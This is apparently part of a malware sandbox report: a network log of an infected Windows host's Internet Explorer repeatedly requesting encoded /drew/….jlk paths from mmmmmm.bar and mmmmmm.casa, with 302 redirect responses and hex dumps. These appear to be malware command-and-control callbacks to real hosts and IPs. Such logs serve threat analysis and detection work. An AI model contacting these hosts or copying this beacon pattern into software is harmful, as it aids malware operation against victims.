                            Jan 12, 2022 11:12:44.904130936 CET12772OUTGET /drew/Ds1R78N_2Bgd/ksR5C2XbSKO/Yc7k5ktFVIid8i/gXsvixQHwiS_2FpA0dw3G/N_2Bpuch8xfCgVi1/3eGL4tTfu87yI4Z/rACMFcq5R63l94qyL6/vlcHhQXeo/qZgsx68QKpo4NqrCF1dk/3YcGWx7UmtRsKmeq5lv/FmW6DXf6X9uCJp_2B2ZKAh/Megb1iUdx9Asj/MGO0ybi4/dX_2BRtHGmdsAOkPpXzDf29/gLUzY5cO4Z/Axcxdm7bOXPwi/H.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Host: mmmmmm.bar
                            Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            46192.168.2.64991031.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:44.908283949 CET12773OUTGET /drew/rYhpfv40P_2B7t/Bl8Jpz3HikWQQZ2Mkwk0t/ZQh_2BBYynk_2B4t/DqzVN_2FWUQJJOS/_2FaWtfbTjlBBgMhMk/405GTqbwj/DLVrqcPBLK3OU_2B5YkW/NfdWgV7ntKvAos8wcTJ/lj70qHp4Em0zMPinA_2BYb/YrcsOfvA5cCI_/2FwArLU4/kwV47_2Ft0B_2BSMsMg0c11/8bx_2F0s6i/XF9Vmsy5pH6_2FDZf/Pr14EuOYxzk9/eg_2FVXSSo5/Nagf3id_/2B1A0aF.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Host: mmmmmm.bar
                            Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            47192.168.2.64990931.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:44.970628023 CET12774OUTGET /drew/Ds1R78N_2Bgd/ksR5C2XbSKO/Yc7k5ktFVIid8i/gXsvixQHwiS_2FpA0dw3G/N_2Bpuch8xfCgVi1/3eGL4tTfu87yI4Z/rACMFcq5R63l94qyL6/vlcHhQXeo/qZgsx68QKpo4NqrCF1dk/3YcGWx7UmtRsKmeq5lv/FmW6DXf6X9uCJp_2B2ZKAh/Megb1iUdx9Asj/MGO0ybi4/dX_2BRtHGmdsAOkPpXzDf29/gLUzY5cO4Z/Axcxdm7bOXPwi/H.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Host: mmmmmm.bar
                            Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            48192.168.2.64991231.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:44.981507063 CET12775OUTGET /drew/QlXIpR0wndbmqlxV0/E1uaBwmWK3WR/XxTfKB75z9_/2F5qjg8wQ5TOnj/tny31CDfamMmuOmtnZ4BO/UrGwEYls5FZr9NOY/qBNRjkAx6JKLl3C/amPvvbpTDPW7l1_2BG/AkIItPcFA/_2BWYnRk9w6cYY0vPsq_/2Br9VFrr411VhgRrDxy/3F_2F7Vlikg4vzRKtAZQJk/l22Naqdec_2BZ/8xjrpB_2/BXmlJcOnZaQy5f8DKHbbt25/ZVw8ezvEsm/bjxITdWRcsoO365Ol39e8/c.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Host: mmmmmm.bar
                            Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            49192.168.2.64991131.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:44.983144045 CET12776OUTGET /drew/rYhpfv40P_2B7t/Bl8Jpz3HikWQQZ2Mkwk0t/ZQh_2BBYynk_2B4t/DqzVN_2FWUQJJOS/_2FaWtfbTjlBBgMhMk/405GTqbwj/DLVrqcPBLK3OU_2B5YkW/NfdWgV7ntKvAos8wcTJ/lj70qHp4Em0zMPinA_2BYb/YrcsOfvA5cCI_/2FwArLU4/kwV47_2Ft0B_2BSMsMg0c11/8bx_2F0s6i/XF9Vmsy5pH6_2FDZf/Pr14EuOYxzk9/eg_2FVXSSo5/Nagf3id_/2B1A0aF.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Host: mmmmmm.bar
                            Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            5192.168.2.64977131.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:10:59.843786001 CET1206OUTGET /drew/Wqqjeuz_2B3o/gTZon0hf6_2/BEGqKHLRv8jJbA/XiM_2F_2BLItgQ9_2FnkV/J37kJU5m548Ry5aD/_2BaeC5gue46teo/Mz94QcIObLwkCmIFSe/AYyEx_2Ft/7flnx_2FeBMaKdb_2BZY/2QcUQ0KczFWXmzcms2u/KqZ09beQmNbj50XJX6IPpt/L8avESS6Nbmyi/27IxeLE_/2B4eudEcqYK8iUY7pnK_2BN/lez_2F9d6B/JO7dBHKHEfmL4H2lk/EeykEsbEse/f.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Host: mmmmmm.bar
                            Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            50192.168.2.64991331.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:45.043010950 CET12777OUTGET /drew/QlXIpR0wndbmqlxV0/E1uaBwmWK3WR/XxTfKB75z9_/2F5qjg8wQ5TOnj/tny31CDfamMmuOmtnZ4BO/UrGwEYls5FZr9NOY/qBNRjkAx6JKLl3C/amPvvbpTDPW7l1_2BG/AkIItPcFA/_2BWYnRk9w6cYY0vPsq_/2Br9VFrr411VhgRrDxy/3F_2F7Vlikg4vzRKtAZQJk/l22Naqdec_2BZ/8xjrpB_2/BXmlJcOnZaQy5f8DKHbbt25/ZVw8ezvEsm/bjxITdWRcsoO365Ol39e8/c.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Host: mmmmmm.bar
                            Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            51192.168.2.64991531.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:45.103502035 CET12778OUTGET /drew/Ds1R78N_2Bgd/ksR5C2XbSKO/Yc7k5ktFVIid8i/gXsvixQHwiS_2FpA0dw3G/N_2Bpuch8xfCgVi1/3eGL4tTfu87yI4Z/rACMFcq5R63l94qyL6/vlcHhQXeo/qZgsx68QKpo4NqrCF1dk/3YcGWx7UmtRsKmeq5lv/FmW6DXf6X9uCJp_2B2ZKAh/Megb1iUdx9Asj/MGO0ybi4/dX_2BRtHGmdsAOkPpXzDf29/gLUzY5cO4Z/Axcxdm7bOXPwi/H.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Host: mmmmmm.bar
                            Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            52192.168.2.64991731.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:45.107233047 CET12779OUTGET /drew/rYhpfv40P_2B7t/Bl8Jpz3HikWQQZ2Mkwk0t/ZQh_2BBYynk_2B4t/DqzVN_2FWUQJJOS/_2FaWtfbTjlBBgMhMk/405GTqbwj/DLVrqcPBLK3OU_2B5YkW/NfdWgV7ntKvAos8wcTJ/lj70qHp4Em0zMPinA_2BYb/YrcsOfvA5cCI_/2FwArLU4/kwV47_2Ft0B_2BSMsMg0c11/8bx_2F0s6i/XF9Vmsy5pH6_2FDZf/Pr14EuOYxzk9/eg_2FVXSSo5/Nagf3id_/2B1A0aF.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Host: mmmmmm.bar
                            Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            53192.168.2.64991931.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:12:45.180743933 CET12781OUTGET /drew/QlXIpR0wndbmqlxV0/E1uaBwmWK3WR/XxTfKB75z9_/2F5qjg8wQ5TOnj/tny31CDfamMmuOmtnZ4BO/UrGwEYls5FZr9NOY/qBNRjkAx6JKLl3C/amPvvbpTDPW7l1_2BG/AkIItPcFA/_2BWYnRk9w6cYY0vPsq_/2Br9VFrr411VhgRrDxy/3F_2F7Vlikg4vzRKtAZQJk/l22Naqdec_2BZ/8xjrpB_2/BXmlJcOnZaQy5f8DKHbbt25/ZVw8ezvEsm/bjxITdWRcsoO365Ol39e8/c.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Host: mmmmmm.bar
                            Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            54192.168.2.64992131.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:13:08.437654018 CET12790OUTGET /drew/9kTn9nma9POHJpkr1Icf/OLGAIzVWdaryEbrg0Mm/vcdVt58PgZbFgFujCibxQS/kcDoJIO3wyYVp/K54vFYEC/gSMgbh5hTjYukOrn_2FVtVO/kxbD7685pw/D6liknAe3SgFx3Zau/fgTRypCpGd6_/2BWwzsFNUTB/kStLFMMJ2IT7_2/BrT00EK5bT2hx2ArBEpna/rJhHQ0GHmwXcGhAL/bY32sGH8COFYlAi/7c_2BXCEC2TYVlC_2B/RMiaKI.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Host: mmmmmm.bar
                            Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            55192.168.2.64992231.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:13:08.501137018 CET12790OUTGET /drew/9kTn9nma9POHJpkr1Icf/OLGAIzVWdaryEbrg0Mm/vcdVt58PgZbFgFujCibxQS/kcDoJIO3wyYVp/K54vFYEC/gSMgbh5hTjYukOrn_2FVtVO/kxbD7685pw/D6liknAe3SgFx3Zau/fgTRypCpGd6_/2BWwzsFNUTB/kStLFMMJ2IT7_2/BrT00EK5bT2hx2ArBEpna/rJhHQ0GHmwXcGhAL/bY32sGH8COFYlAi/7c_2BXCEC2TYVlC_2B/RMiaKI.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Host: mmmmmm.bar
                            Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            56192.168.2.64992431.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:13:08.626446009 CET12792OUTGET /drew/9kTn9nma9POHJpkr1Icf/OLGAIzVWdaryEbrg0Mm/vcdVt58PgZbFgFujCibxQS/kcDoJIO3wyYVp/K54vFYEC/gSMgbh5hTjYukOrn_2FVtVO/kxbD7685pw/D6liknAe3SgFx3Zau/fgTRypCpGd6_/2BWwzsFNUTB/kStLFMMJ2IT7_2/BrT00EK5bT2hx2ArBEpna/rJhHQ0GHmwXcGhAL/bY32sGH8COFYlAi/7c_2BXCEC2TYVlC_2B/RMiaKI.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Host: mmmmmm.bar
                            Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            57192.168.2.649925162.255.119.21980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:13:09.571500063 CET12793OUTGET /drew/34vM2Qz4NrxAJPso/55_2BO7dEpmqKKz/UfdYfTV2D9XUJnIX4u/wEi6o1JYk/kRFDZ6mK40EWlsc6Lw5w/mDVFZVW_2F8m7wnjZkk/bWWghhS_2BpKqwr_2FiGlA/mVW8Mpa2fncUu/9kKvVeUJ/1ENXmn00HlfSkjkGGDRsgIQ/xo_2FicWeq/xi1wE7iI0t8C7Pb_2/B0cr_2Fh2Ic_/2BR5T0WLYrL/GDbKM8aDkZ5B8k/D7fVec54KHjYVnHWNjgpP/2UWjy_2BZuxTwv24/xnHIqz6W2/M.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: mmmmmm.casa
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Jan 12, 2022 11:13:10.110165119 CET12795INHTTP/1.1 302 Found
                            Server: nginx
                            Date: Wed, 12 Jan 2022 10:13:10 GMT
                            Content-Type: text/html; charset=utf-8
                            Content-Length: 347
                            Connection: keep-alive
                            Location: http://www.mmmmmm.casa/drew/34vM2Qz4NrxAJPso/55_2BO7dEpmqKKz/UfdYfTV2D9XUJnIX4u/wEi6o1JYk/kRFDZ6mK40EWlsc6Lw5w/mDVFZVW_2F8m7wnjZkk/bWWghhS_2BpKqwr_2FiGlA/mVW8Mpa2fncUu/9kKvVeUJ/1ENXmn00HlfSkjkGGDRsgIQ/xo_2FicWeq/xi1wE7iI0t8C7Pb_2/B0cr_2Fh2Ic_/2BR5T0WLYrL/GDbKM8aDkZ5B8k/D7fVec54KHjYVnHWNjgpP/2UWjy_2BZuxTwv24/xnHIqz6W2/M.jlk
                            X-Served-By: Namecheap URL Forward
                            Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 6d 6d 6d 6d 6d 2e 63 61 73 61 2f 64 72 65 77 2f 33 34 76 4d 32 51 7a 34 4e 72 78 41 4a 50 73 6f 2f 35 35 5f 32 42 4f 37 64 45 70 6d 71 4b 4b 7a 2f 55 66 64 59 66 54 56 32 44 39 58 55 4a 6e 49 58 34 75 2f 77 45 69 36 6f 31 4a 59 6b 2f 6b 52 46 44 5a 36 6d 4b 34 30 45 57 6c 73 63 36 4c 77 35 77 2f 6d 44 56 46 5a 56 57 5f 32 46 38 6d 37 77 6e 6a 5a 6b 6b 2f 62 57 57 67 68 68 53 5f 32 42 70 4b 71 77 72 5f 32 46 69 47 6c 41 2f 6d 56 57 38 4d 70 61 32 66 6e 63 55 75 2f 39 6b 4b 76 56 65 55 4a 2f 31 45 4e 58 6d 6e 30 30 48 6c 66 53 6b 6a 6b 47 47 44 52 73 67 49 51 2f 78 6f 5f 32 46 69 63 57 65 71 2f 78 69 31 77 45 37 69 49 30 74 38 43 37 50 62 5f 32 2f 42 30 63 72 5f 32 46 68 32 49 63 5f 2f 32 42 52 35 54 30 57 4c 59 72 4c 2f 47 44 62 4b 4d 38 61 44 6b 5a 35 42 38 6b 2f 44 37 66 56 65 63 35 34 4b 48 6a 59 56 6e 48 57 4e 6a 67 70 50 2f 32 55 57 6a 79 5f 32 42 5a 75 78 54 77 76 32 34 2f 78 6e 48 49 71 7a 36 57 32 2f 4d 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                            Data Ascii: <a href='http://www.mmmmmm.casa/drew/34vM2Qz4NrxAJPso/55_2BO7dEpmqKKz/UfdYfTV2D9XUJnIX4u/wEi6o1JYk/kRFDZ6mK40EWlsc6Lw5w/mDVFZVW_2F8m7wnjZkk/bWWghhS_2BpKqwr_2FiGlA/mVW8Mpa2fncUu/9kKvVeUJ/1ENXmn00HlfSkjkGGDRsgIQ/xo_2FicWeq/xi1wE7iI0t8C7Pb_2/B0cr_2Fh2Ic_/2BR5T0WLYrL/GDbKM8aDkZ5B8k/D7fVec54KHjYVnHWNjgpP/2UWjy_2BZuxTwv24/xnHIqz6W2/M.jlk'>Found</a>.
                            Jan 12, 2022 11:13:50.720366001 CET12814OUTGET /drew/f6jKcEUOj8A64/WvqMDEXc/MwmCt7DFVgxdimBO2LgEA0N/ZNXLxEI3Zd/gyEG1BIXvosDrJ_2B/tzo4yrPGybpk/bOXL_2FI4Gk/Dwg0zBI5Va0Vew/VcHtlW2fI_2FlIG4qwYDf/sVWPXPhigWsxWApv/e6KTeVe4jfgkgxB/EAe8o_2FKB_2BS7oKI/ttidUeBuR/ahC5CzjXBQ27gn4y5cPQ/02CG5Yjo_2F7m4jIX1c/yngrPaQmQFL5UmA/13qwwD.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: mmmmmm.casa
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Jan 12, 2022 11:13:50.898165941 CET12816INHTTP/1.1 302 Found
                            Server: nginx
                            Date: Wed, 12 Jan 2022 10:13:50 GMT
                            Content-Type: text/html; charset=utf-8
                            Content-Length: 318
                            Connection: keep-alive
                            Location: http://www.mmmmmm.casa/drew/f6jKcEUOj8A64/WvqMDEXc/MwmCt7DFVgxdimBO2LgEA0N/ZNXLxEI3Zd/gyEG1BIXvosDrJ_2B/tzo4yrPGybpk/bOXL_2FI4Gk/Dwg0zBI5Va0Vew/VcHtlW2fI_2FlIG4qwYDf/sVWPXPhigWsxWApv/e6KTeVe4jfgkgxB/EAe8o_2FKB_2BS7oKI/ttidUeBuR/ahC5CzjXBQ27gn4y5cPQ/02CG5Yjo_2F7m4jIX1c/yngrPaQmQFL5UmA/13qwwD.jlk
                            X-Served-By: Namecheap URL Forward
                            Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 6d 6d 6d 6d 6d 2e 63 61 73 61 2f 64 72 65 77 2f 66 36 6a 4b 63 45 55 4f 6a 38 41 36 34 2f 57 76 71 4d 44 45 58 63 2f 4d 77 6d 43 74 37 44 46 56 67 78 64 69 6d 42 4f 32 4c 67 45 41 30 4e 2f 5a 4e 58 4c 78 45 49 33 5a 64 2f 67 79 45 47 31 42 49 58 76 6f 73 44 72 4a 5f 32 42 2f 74 7a 6f 34 79 72 50 47 79 62 70 6b 2f 62 4f 58 4c 5f 32 46 49 34 47 6b 2f 44 77 67 30 7a 42 49 35 56 61 30 56 65 77 2f 56 63 48 74 6c 57 32 66 49 5f 32 46 6c 49 47 34 71 77 59 44 66 2f 73 56 57 50 58 50 68 69 67 57 73 78 57 41 70 76 2f 65 36 4b 54 65 56 65 34 6a 66 67 6b 67 78 42 2f 45 41 65 38 6f 5f 32 46 4b 42 5f 32 42 53 37 6f 4b 49 2f 74 74 69 64 55 65 42 75 52 2f 61 68 43 35 43 7a 6a 58 42 51 32 37 67 6e 34 79 35 63 50 51 2f 30 32 43 47 35 59 6a 6f 5f 32 46 37 6d 34 6a 49 58 31 63 2f 79 6e 67 72 50 61 51 6d 51 46 4c 35 55 6d 41 2f 31 33 71 77 77 44 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                            Data Ascii: <a href='http://www.mmmmmm.casa/drew/f6jKcEUOj8A64/WvqMDEXc/MwmCt7DFVgxdimBO2LgEA0N/ZNXLxEI3Zd/gyEG1BIXvosDrJ_2B/tzo4yrPGybpk/bOXL_2FI4Gk/Dwg0zBI5Va0Vew/VcHtlW2fI_2FlIG4qwYDf/sVWPXPhigWsxWApv/e6KTeVe4jfgkgxB/EAe8o_2FKB_2BS7oKI/ttidUeBuR/ahC5CzjXBQ27gn4y5cPQ/02CG5Yjo_2F7m4jIX1c/yngrPaQmQFL5UmA/13qwwD.jlk'>Found</a>.
                            Jan 12, 2022 11:14:31.574064970 CET12840OUTGET /drew/6V2kcoNh5zlkLfQFPc/BK1xvKoki/sI2xcD400Cdl5_2BfFpM/88ymBYA3Lf0RW9scFqJ/hZxCNouRVbWyD_2BA0kUFL/Azh_2F37QJ8w5/_2F_2BHJ/YF_2B05Ux0nGHzUMeX6_2Be/Gj4AjkO056/z7zfXvOS0Ck9ij1T9/ivOOUShQT_2F/O9VYsyMhlJb/T4tSNfoaQI67_2/FGgXNRDCGCG5WTW5VVa0g/XJjtgZS8MSjTGuOi/Remmz7x4_2BJS/95Bf3HvZ/j.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: mmmmmm.casa
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Jan 12, 2022 11:14:31.751749992 CET12842INHTTP/1.1 302 Found
                            Server: nginx
                            Date: Wed, 12 Jan 2022 10:14:31 GMT
                            Content-Type: text/html; charset=utf-8
                            Content-Length: 327
                            Connection: keep-alive
                            Location: http://www.mmmmmm.casa/drew/6V2kcoNh5zlkLfQFPc/BK1xvKoki/sI2xcD400Cdl5_2BfFpM/88ymBYA3Lf0RW9scFqJ/hZxCNouRVbWyD_2BA0kUFL/Azh_2F37QJ8w5/_2F_2BHJ/YF_2B05Ux0nGHzUMeX6_2Be/Gj4AjkO056/z7zfXvOS0Ck9ij1T9/ivOOUShQT_2F/O9VYsyMhlJb/T4tSNfoaQI67_2/FGgXNRDCGCG5WTW5VVa0g/XJjtgZS8MSjTGuOi/Remmz7x4_2BJS/95Bf3HvZ/j.jlk
                            X-Served-By: Namecheap URL Forward
                            Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 6d 6d 6d 6d 6d 2e 63 61 73 61 2f 64 72 65 77 2f 36 56 32 6b 63 6f 4e 68 35 7a 6c 6b 4c 66 51 46 50 63 2f 42 4b 31 78 76 4b 6f 6b 69 2f 73 49 32 78 63 44 34 30 30 43 64 6c 35 5f 32 42 66 46 70 4d 2f 38 38 79 6d 42 59 41 33 4c 66 30 52 57 39 73 63 46 71 4a 2f 68 5a 78 43 4e 6f 75 52 56 62 57 79 44 5f 32 42 41 30 6b 55 46 4c 2f 41 7a 68 5f 32 46 33 37 51 4a 38 77 35 2f 5f 32 46 5f 32 42 48 4a 2f 59 46 5f 32 42 30 35 55 78 30 6e 47 48 7a 55 4d 65 58 36 5f 32 42 65 2f 47 6a 34 41 6a 6b 4f 30 35 36 2f 7a 37 7a 66 58 76 4f 53 30 43 6b 39 69 6a 31 54 39 2f 69 76 4f 4f 55 53 68 51 54 5f 32 46 2f 4f 39 56 59 73 79 4d 68 6c 4a 62 2f 54 34 74 53 4e 66 6f 61 51 49 36 37 5f 32 2f 46 47 67 58 4e 52 44 43 47 43 47 35 57 54 57 35 56 56 61 30 67 2f 58 4a 6a 74 67 5a 53 38 4d 53 6a 54 47 75 4f 69 2f 52 65 6d 6d 7a 37 78 34 5f 32 42 4a 53 2f 39 35 42 66 33 48 76 5a 2f 6a 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                            Data Ascii: <a href='http://www.mmmmmm.casa/drew/6V2kcoNh5zlkLfQFPc/BK1xvKoki/sI2xcD400Cdl5_2BfFpM/88ymBYA3Lf0RW9scFqJ/hZxCNouRVbWyD_2BA0kUFL/Azh_2F37QJ8w5/_2F_2BHJ/YF_2B05Ux0nGHzUMeX6_2Be/Gj4AjkO056/z7zfXvOS0Ck9ij1T9/ivOOUShQT_2F/O9VYsyMhlJb/T4tSNfoaQI67_2/FGgXNRDCGCG5WTW5VVa0g/XJjtgZS8MSjTGuOi/Remmz7x4_2BJS/95Bf3HvZ/j.jlk'>Found</a>.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            58192.168.2.649926162.255.119.21980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:13:09.937128067 CET12794OUTGET /drew/5Ri1ZRKiUj4KbdI8X3X/Jh19vlM5zKBKS9GzxSI_2F/EeCCCUkcTJxTJ/yjPTlmAW/SRBKYkKZFvOHA4e8slv_2B6/sLkQXSK6LI/s0_2BnCvQV54waFnt/9tgrPrbqXj5k/QVIFNHGIBgE/RWfKnmy0BvALOE/25vpZVbkJbBKa_2B5YQxG/4FAVo0rUlWPdhkO0/sxn_2FX_2BnOQOo/3GUZiFJLlyne50XHpa/61qsG5vaM/AQ3AuwpegmAJLs_2FJdJ/D.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: mmmmmm.casa
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Jan 12, 2022 11:13:10.126943111 CET12796INHTTP/1.1 302 Found
                            Server: nginx
                            Date: Wed, 12 Jan 2022 10:13:10 GMT
                            Content-Type: text/html; charset=utf-8
                            Content-Length: 320
                            Connection: keep-alive
                            Location: http://www.mmmmmm.casa/drew/5Ri1ZRKiUj4KbdI8X3X/Jh19vlM5zKBKS9GzxSI_2F/EeCCCUkcTJxTJ/yjPTlmAW/SRBKYkKZFvOHA4e8slv_2B6/sLkQXSK6LI/s0_2BnCvQV54waFnt/9tgrPrbqXj5k/QVIFNHGIBgE/RWfKnmy0BvALOE/25vpZVbkJbBKa_2B5YQxG/4FAVo0rUlWPdhkO0/sxn_2FX_2BnOQOo/3GUZiFJLlyne50XHpa/61qsG5vaM/AQ3AuwpegmAJLs_2FJdJ/D.jlk
                            X-Served-By: Namecheap URL Forward
                            Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 6d 6d 6d 6d 6d 2e 63 61 73 61 2f 64 72 65 77 2f 35 52 69 31 5a 52 4b 69 55 6a 34 4b 62 64 49 38 58 33 58 2f 4a 68 31 39 76 6c 4d 35 7a 4b 42 4b 53 39 47 7a 78 53 49 5f 32 46 2f 45 65 43 43 43 55 6b 63 54 4a 78 54 4a 2f 79 6a 50 54 6c 6d 41 57 2f 53 52 42 4b 59 6b 4b 5a 46 76 4f 48 41 34 65 38 73 6c 76 5f 32 42 36 2f 73 4c 6b 51 58 53 4b 36 4c 49 2f 73 30 5f 32 42 6e 43 76 51 56 35 34 77 61 46 6e 74 2f 39 74 67 72 50 72 62 71 58 6a 35 6b 2f 51 56 49 46 4e 48 47 49 42 67 45 2f 52 57 66 4b 6e 6d 79 30 42 76 41 4c 4f 45 2f 32 35 76 70 5a 56 62 6b 4a 62 42 4b 61 5f 32 42 35 59 51 78 47 2f 34 46 41 56 6f 30 72 55 6c 57 50 64 68 6b 4f 30 2f 73 78 6e 5f 32 46 58 5f 32 42 6e 4f 51 4f 6f 2f 33 47 55 5a 69 46 4a 4c 6c 79 6e 65 35 30 58 48 70 61 2f 36 31 71 73 47 35 76 61 4d 2f 41 51 33 41 75 77 70 65 67 6d 41 4a 4c 73 5f 32 46 4a 64 4a 2f 44 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                            Data Ascii: <a href='http://www.mmmmmm.casa/drew/5Ri1ZRKiUj4KbdI8X3X/Jh19vlM5zKBKS9GzxSI_2F/EeCCCUkcTJxTJ/yjPTlmAW/SRBKYkKZFvOHA4e8slv_2B6/sLkQXSK6LI/s0_2BnCvQV54waFnt/9tgrPrbqXj5k/QVIFNHGIBgE/RWfKnmy0BvALOE/25vpZVbkJbBKa_2B5YQxG/4FAVo0rUlWPdhkO0/sxn_2FX_2BnOQOo/3GUZiFJLlyne50XHpa/61qsG5vaM/AQ3AuwpegmAJLs_2FJdJ/D.jlk'>Found</a>.
